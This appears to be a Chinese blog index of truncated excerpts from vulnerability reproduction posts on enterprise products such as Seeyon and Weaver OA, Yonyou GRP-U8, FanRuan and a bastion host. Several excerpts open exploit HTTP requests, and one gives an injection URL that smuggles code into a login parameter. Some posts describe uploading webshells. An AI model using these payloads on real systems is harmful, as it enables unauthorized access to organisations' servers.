漏洞点在 /directdata/direct/router 具体包如下: POST /directdata/direct/router HTTP/1.1 Host: 192.168.10.6 Connection: close Cache-Control: max-age=0 sec-ch-ua: "Google...
Apache2.4 模块开发初探
一、开发文档 Apache 的开发文档:http://httpd.apache.org/docs/2.2/zh-cn/developer/ 二、、安装Apache 系统 Ubuntu 20.04.2 LTS 我这里使用的宝塔一键安装的编译环境...
亿邮电子邮件系统存在远程命令执行漏洞 漏洞复现
POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1 Host: 192.168.10.1 Content-Length: 25 Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML...
某治堡垒机任意用户登录
HTTP://x.x.x.x/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm 状态码返回200,存在漏洞;“错误...
致远OA 前台getshell 复现
首先是一个获取管理cookie的漏洞。然后上传压缩文件进行解压。达到getshell的目的 POST /seeyon/thirdpartyController.do HTTP/1.1 Host: 192.168.10.2 User-Agent: python-requests/2.25....
用友 GRP-u8 SQL注入 漏洞复现
POST /Proxy HTTP/1.1 Host: 192.168.10.2:8025 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.1...
泛微OA9 前台无限制Getshell 复现
漏洞位于:/page/exportImport/uploadOperation.jsp文件中 Jsp流程大概是:判断请求是否是multipart请求。然后直接上传 重点关注File file=new File(savepath+filename), Fil...
腾讯云云函数初探
云函数地址 https://console.cloud.tencent.com/scf 云函数开发文档 https://cloud.tencent.com/document/product/583/19806 一、新建云函数 选择...
帆软 V9 getshell
注意: 这个漏洞是任意文件覆盖,上传 JSP 马,需要找已存在的 jsp 文件进行覆盖 Tomcat 启动帆软后默认存在的 JSP 文件: POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&fi...
dzzoffice 前台RCE复现
一、环境安装 源代码: https://github.com/zyx0814/dzzoffice/releases/ 二、利用前提 首先需要获取到authkey 这个可以通过爆破或者其他的方式获取到具体的这...